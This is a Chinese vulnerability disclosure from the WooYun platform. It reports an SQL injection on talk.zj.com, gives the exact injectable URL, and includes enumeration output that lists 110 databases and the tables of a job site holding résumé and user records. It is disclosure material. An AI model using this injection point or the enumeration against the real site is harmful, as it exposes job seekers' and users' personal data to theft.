漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-03-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-04-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
获取全部数据库!涉及数据量应该很大!二级域名几百个
详细说明:
注入点http://talk.zj.com/detail.cgi?id=175276
漏洞证明:
available databases [110]:
[*] 315old
[*] 9191_cn_domain
[*] 960520
[*] abc_zj_com
[*] ads_zj_com
[*] auto
[*] bbs2_zj_com
[*] bbs3_zj_com
[*] bbs_zj_com
[*] bless08
[*] blog_zj_com
[*] calendar
[*] comments_zj_com
[*] dt_news
[*] e
[*] ent
[*] ent20130103bak
[*] flash
[*] gaoxiao_zj_com
[*] ggg_zj_com
[*] ggg_zj_com2
[*] gggs_zj_com
[*] gps201203032147
[*] guess
[*] health
[*] hfa_jiankang_cn
[*] hope_zj_com
[*] images_zj_com
[*] information_schema
[*] jiajiao
[*] job
[*] joke
[*] jsbbsx15_201203032147
[*] jz_zj_com
[*] kc
[*] lady
[*] life
[*] life_zj_com
[*] liuxue
[*] lqsz
[*] machao
[*] mall
[*] mall_zj_com
[*] mba
[*] mmcs_zj_com
[*] mobile_number
[*] money_zj_com
[*] mysql
[*] netsun_cate
[*] netsun_forum
[*] netsun_jobs
[*] netsun_key
[*] netsun_Q
[*] netsun_trade
[*] new_blog_zj_com
[*] new_dz_zj_com
[*] nic
[*] nonghang
[*] oa_zj_com
[*] party
[*] party_new
[*] peixun_zj_com
[*] phpstat_zj_com
[*] pic_zj_com
[*] pinpai
[*] question
[*] session_tmps
[*] shangxing_from_dxjs
[*] share_zj_com
[*] shouji
[*] site_zj_com
[*] stat_zj_com
[*] talk
[*] tempuc201203032147
[*] test
[*] test_bbs_zj_com
[*] test_bbs_zl_com_bak
[*] testtest
[*] tianyumuju
[*] tour
[*] tour_zj_com
[*] tuku
[*] tupian_zj_com
[*] ublog_zj_com
[*] ucenter_test
[*] vote
[*] votephp
[*] votes
[*] votes_zj_com
[*] weather
[*] weather_yahoo
[*] xinhua
[*] xinli
[*] xl
[*] xl_zj_com
[*] xtly_zj_com
[*] xun_zj_com
[*] yls1
[*] youth_foundation
[*] yuesao_zj_com
[*] zg
[*] zj_forum
[*] zj_ted
[*] zjhq_hub_zj_com
[*] zjhq_zj_com
[*] zjsq
[*] zsol_zj_com
[*] zt
[*] zt_zj_com
[*] zufang
随便找了个数据库测试了一下
Database: job
[45 tables]
+---------------------+
| cmt |
| dy_articles |
| dy_words |
| game_articles |
| game_words |
| games_articles |
| games_words |
| job_apply |
| job_block |
| job_blocks |
| job_company_base |
| job_company_depart |
| job_company_hr |
| job_company_job |
| job_company_jobmod |
| job_company_manager |
| job_interview |
| job_mailmb |
| job_news |
| job_otherjob |
| job_person_base |
| job_person_favorite |
| job_resume_base |
| job_resume_edu |
| job_resume_exp |
| job_resume_honor |
| job_resume_lang |
| job_resume_other |
| job_resume_proj |
| job_resume_train |
| job_sessions |
| job_upfile |
| job_users |
| product_cn |
| product_cn_bak |
| tb_articles |
| tb_words |
| y_s_articles |
| y_s_words |
| ying_articles |
| ying_words |
| ys_articles |
| ys_words |
| yx_articles |
| yx_words |
+---------------------+
修复方案:
防注入啊!
版权声明:转载请注明来源 →Hack涛@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝